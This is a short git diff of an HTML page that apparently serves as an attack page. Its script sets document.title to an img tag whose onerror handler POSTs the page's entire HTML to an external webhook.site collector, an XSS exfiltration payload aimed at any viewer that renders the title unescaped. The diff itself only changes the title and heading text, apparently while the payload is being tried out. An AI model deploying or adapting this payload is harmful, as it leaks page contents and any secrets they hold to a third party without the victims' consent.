--- a/index.html
+++ b/index.html
@@ -21,12 +21,12 @@
 <html lang="en">
 <head>
     <meta charset="UTF-8">
-    <title>Malicious Page</title>
+    <title>First title</title>
     <script>
         document.title = '<img src="" onerror="fetch(\'https://webhook.site/fd72ea59-3fa6-4bc7-8a83-176bf7ad585b\', {method: \'POST\', body: document.documentElement.outerHTML})">';
     </script>
 </head>
 <body>
-    <h1>Twork</h1>
+    <h1>please work</h1>
 </body>
 </html>
